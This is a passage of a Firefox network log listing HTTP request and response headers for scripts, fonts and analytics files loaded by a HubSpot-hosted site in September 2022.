access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
expires: Wed, 14 Sep 2022 23:00:49 GMT
cf-cache-status: REVALIDATED
vary: Accept-Encoding
server: cloudflare
cf-ray: 74acb6608e8c0d42-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /HubspotToolsMenu/static-1.138/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Wed, 27 Jul 2022 14:35:54 GMT
etag: W/"0d86ec7be24f2dff2308b8edf54c2f32"
x-amz-server-side-encryption: AES256
x-amz-version-id: k79.hN9WG526nViFF800Vr3DxQF_q.yo
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 2f7792bdc67f7953e2dce93aea1bb9ee.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: YLTjijGIrvYs-mnf4m802qhKaeCMPTJPO9kWnGo7DPUFSWw4moWKag==
cf-cache-status: HIT
age: 1754106
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WeVhhj045tWgGynX5a84rsHdB0woJo7cUsyKTVHlV7tVy5T3FR3oeLW49F6kXAFF9dF9i0xwMBGHl6cjrn7LK7igfISeuUTPi%2FKsyHAJ335p3mFvhd%2F%2FwHO9MRPX%2BhcHNlRpG9J56Ps%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65dccbab50b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Roboto:regular,700&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 14 Sep 2022 22:55:49 GMT
date: Wed, 14 Sep 2022 22:55:49 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019149/module_-2712622_Site_Search_Input.min.js HTTP/1.1 
Host: cdn2.hubspot.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.244.204
HTTP/2 200 OK
content-type: text/plain;charset=utf-8
x-hs-alternate-content-type: text/plain
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
cf-ray: 74acb65dcb36b4eb-OSL
access-control-allow-origin: *
age: 183372
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"0953d5b1fcbcfc6d9e817b542caf4b9f"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019149
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bnVBDNLWPhKSzDPBuoI2e3Y4TzCnqdlTMM22SSMOTLmZtDkf1XWwYf8PNIgmR7OmRR2KPubUMHsMFsv2T0jak7JYcmsPjNTd0RaMGxzQYywcKeoM8MCKwbSKPTW7BrRml9E%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /analytics/1663196100000/26246913.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
x-amz-id-2: BUM8I5DuHki3qtkSn6lu4nECwZ+qXk/r8ULxeBev5YqgYDXY/6j6D3qG+53BTtuQeCGPWjZjoDE=
x-amz-request-id: V6WM942M2RD0X5KM
last-modified: Tue, 13 Sep 2022 13:50:54 GMT
etag: W/"a465556d49817da34d8ad624037e7756"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Wed, 14 Sep 2022 23:00:50 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74acb6628a3c98eb-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---